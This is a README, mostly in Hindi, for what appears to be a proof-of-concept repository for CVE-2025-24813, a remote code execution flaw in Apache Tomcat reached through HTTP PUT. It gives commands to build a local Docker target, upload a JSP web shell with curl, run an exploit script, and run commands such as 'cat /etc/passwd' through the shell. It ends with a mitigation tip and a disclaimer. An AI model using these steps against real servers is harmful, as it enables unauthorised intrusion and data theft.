
Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC
यह रिपॉजिटरी CVE-2025-24813 के लिए एक पूर्ण प्रूफ-ऑफ-कॉन्सेप्ट (PoC) रखता है, जो Apache Tomcat में HTTP PUT विधि का उपयोग करके एक दुर्भावनापूर्ण JSP वेब शेल को तैनात करने वाली एक दूरस्थ कोड निष्पादन (RCE) कमजोरी है।
🔥 यह शोषण दर्शाता है कि कैसे एक हमलावर अनुचित रूप से सुरक्षित Tomcat इंस्टेंस में फ़ाइल अपलोड और पेलोड निष्पादन के माध्यम से RCE प्राप्त कर सकता है।
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
📸 
📸 
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
📸 
python3 exploit/1_exploit_cve_2025_24813.py
📸 
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
📸 
📸 
📸 
📸 
📸 
web.xml या सर्वर कॉन्फ़िगरेशन में PUT/DELETE विधियाँ अक्षम करेंयह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। उन सिस्टमों पर अनधिकृत परीक्षण, शोषण या उपयोग जिनके आप मालिक नहीं हैं या जिनका परीक्षण करने की अनुमति नहीं है, अवैध और अनैतिक है।
शिवशांत पाटिल
प्रमाणित एथिकल हैकर (CEH v13)
B.Tech कंप्यूटर इंजीनियरिंग स्नातक
🔗 LinkedIn
🔗 GitHub